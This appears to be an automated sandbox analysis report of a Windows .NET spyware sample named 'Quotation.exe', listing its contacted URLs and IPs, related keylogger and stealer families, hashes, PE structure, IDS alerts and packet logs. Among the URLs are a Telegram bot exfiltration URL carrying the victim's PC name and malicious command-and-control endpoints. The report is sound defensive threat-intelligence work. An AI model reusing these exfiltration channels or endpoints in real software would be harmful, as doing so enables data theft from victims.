https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:377142%0D%0ADate%20a	Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
https://reallyfreegeoip.org/xml/8.46.123.33$	Quotation.exe, 00000000.00000002.4104956397.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A09000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://anotherarmy.dns.army:8081	Quotation.exe	true	URL Reputation: malware	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://checkip.dyndns.org/q	Quotation.exe	false	URL Reputation: safe	unknown
https://chrome.google.com/webstore?hl=enlB	Quotation.exe, 00000000.00000002.4104956397.0000000002B4C000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://reallyfreegeoip.org	Quotation.exe, 00000000.00000002.4104956397.0000000002A4E000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.00000000029DE000.00000004.00000800.00020000.00000000.sdmp, Quotation.exe, 00000000.00000002.4104956397.0000000002A75000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://mail.electradubai.com	Quotation.exe, 00000000.00000002.4104956397.0000000002B0E000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	Quotation.exe, 00000000.00000002.4104956397.0000000002991000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Quotation.exe, 00000000.00000002.4106555406.00000000039B1000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	Quotation.exe	false	URL Reputation: safe	unknown
https://reallyfreegeoip.org/xml/	Quotation.exe	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	true
188.114.96.3	reallyfreegeoip.org	European Union	13335	CLOUDFLARENETUS	true
192.250.231.25	mail.electradubai.com	United States	36454	CNSV-LLCUS	true
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1527820
Start date and time:	2024-10-07 10:12:09 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 47s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Quotation.exe
Detection:	MAL
Classification:	mal100.troj.spyw.winEXE@1/0@4/4
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 66 Number of non-executed functions: 8
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:13:29	API Interceptor	9002018x Sleep call for process: Quotation.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	e4L9TXRBhB.exe	Get hash	malicious	XWorm	Browse
	YirR3DbZQp.exe	Get hash	malicious	XWorm	Browse
	qtYuyATh0U.exe	Get hash	malicious	XWorm	Browse
	SOA-injazfe-10424.vbs	Get hash	malicious	XWorm	Browse
	Quote_ECM129_ Kumbih III.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	INVOICE-COAU7230734290.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	8QBpLkbY6i.exe	Get hash	malicious	WhiteSnake Stealer	Browse
188.114.96.3	http://revexhibition.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	revexhibition.pages.dev/favicon.ico
	http://meta.case-page-appeal.eu/community-standard/112225492204863/	Get hash	malicious	Unknown	Browse	meta.case-page-appeal.eu/assets/k9854w4e5136q5a-f2169603.png
	http://www.tkmall-wholesale.com/	Get hash	malicious	Unknown	Browse	www.tkmall-wholesale.com/
	c1#U09a6.exe	Get hash	malicious	Unknown	Browse	winfileshare.com/ticket_line/llb.php
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eZFzMENr/download
	QUOTATION_OCTQTRA071244PDF.scr.exe	Get hash	malicious	Unknown	Browse	filetransfer.io/data-package/eZFzMENr/download
	1tstvk3Sls.exe	Get hash	malicious	RHADAMANTHYS	Browse	microsoft-rage.world/Api/v3/qjqzqiiqayjq
	http://Asm.alcateia.org	Get hash	malicious	HTMLPhisher	Browse	asm.alcateia.org/
	hbwebdownload - MT 103.exe	Get hash	malicious	FormBook	Browse	www.j88.travel/c24t/?Edg8Tp=iDjdFciE5wc5h9D9V74ZS/2sliUdDJEhqWnTSCKxgeFtQoD7uajT9bZ2+lW3g3vOrk23&iL30=-ZRd9JBXfLe8q2J
	z4Shipping_document_pdf.exe	Get hash	malicious	FormBook	Browse	www.bayarcepat19.click/g48c/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	VX7fQ2wEzC.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	jHSDuYLeUl.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	na.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	188.114.97.3
	na.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	188.114.96.3
	Quote_ECM129_ Kumbih III.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	INVOICE-COAU7230734290.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	Bukti-Transfer...exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
checkip.dyndns.com	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	158.101.44.242
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	VX7fQ2wEzC.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	jHSDuYLeUl.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	na.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	193.122.6.168
	na.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	132.226.8.169
	Quote_ECM129_ Kumbih III.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	INVOICE-COAU7230734290.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Bukti-Transfer...exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
mail.electradubai.com	z64BLPL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.250.231.25
api.telegram.org	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	e4L9TXRBhB.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	YirR3DbZQp.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	qtYuyATh0U.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	SOA-injazfe-10424.vbs	Get hash	malicious	XWorm	Browse	149.154.167.220
	Quote_ECM129_ Kumbih III.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	INVOICE-COAU7230734290.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	8QBpLkbY6i.exe	Get hash	malicious	WhiteSnake Stealer	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	149.154.167.220
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	zncaKWwEdq.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
	e4L9TXRBhB.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	YirR3DbZQp.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	qtYuyATh0U.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	https://floral-heart-eeff.3p3ka4x.workers.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://sexyboobsme.pages.dev/	Get hash	malicious	Porn Scam	Browse	149.154.167.99
	https://telegrambotfix.pages.dev/	Get hash	malicious	Unknown	Browse	149.154.167.99
CNSV-LLCUS	z64BLPL.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	192.250.231.25
	F#U0130YAT TEKL#U0130F#U0130-2400.exe	Get hash	malicious	AgentTesla	Browse	192.250.227.28
	https://sesworld.com.au:443/it/mount/	Get hash	malicious	Unknown	Browse	192.250.235.25
	https://hmchive.com/?hcv=bGFldGl0aWEucGF0cnktYmFsYXRAc3VlZHp1Y2tlcmdyb3VwLmNvbS0tLS1DYXJsb3MgR2FpdMOhbg==	Get hash	malicious	Unknown	Browse	192.250.227.21
	z27PEDIDOSDECOTIZACI__N___s__x__l__x___.exe	Get hash	malicious	FormBook	Browse	192.250.231.28
	https://sgsconsulting.com/	Get hash	malicious	Unknown	Browse	192.250.227.23
	https://sgsconsulting.com/	Get hash	malicious	Unknown	Browse	192.250.227.23
	http://linkplea.se/doar	Get hash	malicious	Unknown	Browse	192.250.229.80
	rfq_commercial_order_GMlist_for_Drumedis_tender_august_quater_2024.vbs	Get hash	malicious	GuLoader, Remcos	Browse	192.250.234.170
	https://kanomama.com/KFKFLDRFKLEK?///RG9tYWluXFVzZXJuYW1lQGRvbWFpbi5jb20=	Get hash	malicious	HTMLPhisher	Browse	192.250.229.40
CLOUDFLARENETUS	https://pub-40cb77b4a6d84294bfa2db6a96f70ff7.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-21e2ca3bca8444aab694f2d286d3f97f.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-2fd40031391d4470a8c3c1090493deca.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-0b1b4754e32d4359b9a318e8133d30bc.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://pub-53d8c8824459455a8bb62d4b9a0d5f2f.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	172.66.0.235
	https://pub-737d748721344356b3ba725600a8404d.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://patjimmy323.wixsite.com/my-site-1/	Get hash	malicious	HTMLPhisher	Browse	162.159.140.229
	http://ikergalindez.github.io/gofish/	Get hash	malicious	HTMLPhisher	Browse	104.21.235.213
	https://coisunibaseaiusignin.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	104.16.117.116
	Farahexperiences.com_Report_87018.pdf	Get hash	malicious	Unknown	Browse	104.17.25.14
UTMEMUS	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	VX7fQ2wEzC.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	jHSDuYLeUl.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	na.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	132.226.8.169
	Quote_ECM129_ Kumbih III.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	INVOICE-COAU7230734290.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Confirmation transfer AGS # 03-10-24.scr.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169
	Urgent inquiry for quotation.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Payment Advice - Advice Ref pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Ziraat Bankasi Swift Mesaji_20241003_3999382.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	sam.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	ENQUIRY NEED QUOTATION.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	2i3Lj7a8Gk.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	VX7fQ2wEzC.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	jHSDuYLeUl.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	zncaKWwEdq.exe	Get hash	malicious	Vidar	Browse	188.114.96.3
	na.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	188.114.96.3
	na.hta	Get hash	malicious	Cobalt Strike, Snake Keylogger	Browse	188.114.96.3
	Winscreen.exe	Get hash	malicious	Xmrig	Browse	188.114.96.3
	Quote_ECM129_ Kumbih III.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
3b5074b1b5d032e5620f69f9f700ff0e	https://pub-0b1b4754e32d4359b9a318e8133d30bc.r2.dev/index.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://coisunibaseaiusignin.gitbook.io/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://pub-51f896deb233450089fc1a520e6ed957.r2.dev/kanehods.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://geminislogins.gitbook.io/us/	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://pub-2801359d2be54bfd8701132626efeb73.r2.dev/owoed.html	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	http://jamesfortune619.wixsite.com/my-site-4/	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://cp-wc32.syd02.ds.network/~melbou28/cgi.bin/fr/d7f1d/	Get hash	malicious	Unknown	Browse	149.154.167.220
	OTO2wVGgkl.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://pub-21beea42d44e4f0e83b5336b9ac3900a.r2.dev/woosf.html	Get hash	malicious	Unknown	Browse	149.154.167.220
	http://advertising-copyright-review.d2taqiqjh5pjw0.amplifyapp.com/	Get hash	malicious	Unknown	Browse	149.154.167.220

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.6348501028935125
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.79% Win32 Executable (generic) a (10002005/4) 49.75% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Windows Screen Saver (13104/52) 0.07% Win16/32 Executable Delphi generic (2074/23) 0.01%
File name:	Quotation.exe
File size:	276'992 bytes
MD5:	f485d8c73bcc8ac6ab3f432f2258d030
SHA1:	7f990d4304126a8d731b0b5a99be8a5dad0d0090
SHA256:	7f285582f0f5bcda85cbc485d3e29ff0cc0693f68a6d2be98fac0866b1524f67
SHA512:	3a24a8bc8d554bb653e77906976a418126595c256397a756d6093871b0ff761b0600b0f3039a5c8a7dcb8b4845a7274743b7213e0283c1d82ad3d04396c11872
SSDEEP:	3072:jWAT5ctg+Orw0aqqb5mlXYOE6jc7dz0pHuchXtQabfiZEsoAUYTVg4i9bbY:A6fh9QabK4b
TLSH:	384484092FE8A801D6FF8877C2B64125C6BAF46306698D3E16D1F81A3E3D541DE46F63
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......f..............P..$..........^C... ...`....@.. ....................................@................................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x44435e
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x669085D9 [Fri Jul 12 01:24:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4430c	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x46000	0x1017	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x48000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x42364	0x42400	6fab44069e4d05de67e9e417ce540ba7	False	0.2140072228773585	data	5.636622019462957	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x46000	0x1017	0x1200	78b97a769c57cf460625c961b04b1a16	False	0.3543836805555556	data	4.76801789588623	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x48000	0xc	0x200	a8f749137ef27fb0cd402a54552ebf75	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0x460a0	0x31c	data			0.4271356783919598
RT_MANIFEST	0x463bc	0xc5b	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.3926651912741069

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-07T10:13:29.091145+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49704	132.226.247.73	80	TCP
2024-10-07T10:13:30.888015+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49704	132.226.247.73	80	TCP
2024-10-07T10:13:31.432429+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49706	188.114.96.3	443	TCP
2024-10-07T10:13:32.154035+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49707	132.226.247.73	80	TCP
2024-10-07T10:13:33.450514+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49709	132.226.247.73	80	TCP
2024-10-07T10:13:34.825502+0200	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.8	49711	132.226.247.73	80	TCP
2024-10-07T10:13:35.384647+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.8	49712	188.114.96.3	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 7, 2024 10:13:28.010461092 CEST	49704	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:28.015269041 CEST	80	49704	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:28.015414953 CEST	49704	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:28.015691996 CEST	49704	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:28.020483971 CEST	80	49704	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:28.708383083 CEST	80	49704	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:28.763062000 CEST	49704	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:28.796660900 CEST	49704	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:28.801557064 CEST	80	49704	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:29.041935921 CEST	80	49704	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:29.091145039 CEST	49704	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:29.787615061 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:29.787653923 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:29.787724018 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:29.921655893 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:29.921677113 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:30.392541885 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:30.392715931 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:30.398111105 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:30.398121119 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:30.398416042 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:30.450481892 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:30.451227903 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:30.491413116 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:30.558051109 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:30.558140039 CEST	443	49705	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:30.558226109 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:30.619772911 CEST	49705	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:30.623306036 CEST	49704	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:30.628056049 CEST	80	49704	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:30.833537102 CEST	80	49704	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:30.835681915 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:30.835711002 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:30.835809946 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:30.836204052 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:30.836215019 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:30.888015032 CEST	49704	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:31.299746037 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:31.302071095 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:31.302086115 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:31.432430029 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:31.432549953 CEST	443	49706	188.114.96.3	192.168.2.8
Oct 7, 2024 10:13:31.432601929 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:31.433049917 CEST	49706	443	192.168.2.8	188.114.96.3
Oct 7, 2024 10:13:31.436579943 CEST	49704	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:31.437977076 CEST	49707	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:31.441741943 CEST	80	49704	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:31.442373037 CEST	49704	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:31.442864895 CEST	80	49707	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:31.443406105 CEST	49707	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:31.443406105 CEST	49707	80	192.168.2.8	132.226.247.73
Oct 7, 2024 10:13:31.448365927 CEST	80	49707	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:32.110574007 CEST	80	49707	132.226.247.73	192.168.2.8
Oct 7, 2024 10:13:32.112097979 CEST	49708	443	192.168.2.8	188.114.96.3
